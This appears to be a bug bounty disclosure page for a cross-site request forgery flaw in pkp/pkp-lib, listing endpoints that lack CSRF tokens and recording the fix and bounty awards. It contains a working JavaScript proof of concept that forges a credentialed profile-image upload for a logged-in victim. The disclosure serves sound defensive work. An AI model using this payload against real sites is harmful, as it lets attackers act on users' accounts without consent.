Cross-Site Request Forgery (CSRF) in pkp/pkp-lib


Reported on

Oct 16th 2021


No CSRF protection on the profile image upload endpoint either: /index.php/e/$$$call$$$/tab/user/profile-tab/upload-profile-image.

More endpoints:

Reordering data:



POC for upload files

        // Cross-site request: with withCredentials set, the browser attaches the
        // victim's session cookie, and nothing in the request proves the user intended it.
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "$$$call$$$/tab/user/profile-tab/upload-profile-image", true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "de-de,de;q=0.8,en-us;q=0.5,en;q=0.3");
        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------moxieboundary1634260375680");
        xhr.withCredentials = true;
        // Hand-built multipart/form-data body; no CSRF token field is included.
        var body = "-----------------------------moxieboundary1634260375680\r\n" +
          "Content-Disposition: form-data; name=\"name\"\r\n" +
          "\r\n" + "cat.jpg" +
          "\r\n" +
          "-----------------------------moxieboundary1634260375680\r\n" +
          "Content-Disposition: form-data; name=\"uploadedFile\"; filename=\"cat.jpg\"\r\n" +
          "Content-Type: text/xml\r\n" +
          "\r\n" +
          "[FILE_CONTENT_HERE]" + "\r\n" +
          "-----------------------------moxieboundary1634260375680--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i);
        xhr.send(new Blob([aBody]));


This vulnerability allows an attacker to trick a logged-in user into changing their own profile picture without their knowledge.


no token in the upload profile frontend

no token in the upload profile backend

no token in save category grid sequence backend

no token in the save grid sequence backend

We have contacted a member of the pkp/pkp-lib team and are waiting to hear back 2 years ago
haxatron modified the report
2 years ago
Alec Smecher validated this vulnerability 2 years ago
haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
Alec Smecher marked this as fixed with commit 169885 2 years ago
Alec Smecher has been awarded the fix bounty
This vulnerability will not receive a CVE
Alec Smecher
2 years ago


Note that the two CSRF checks are added in separate commits; I flagged one of them as the fix. Both are:
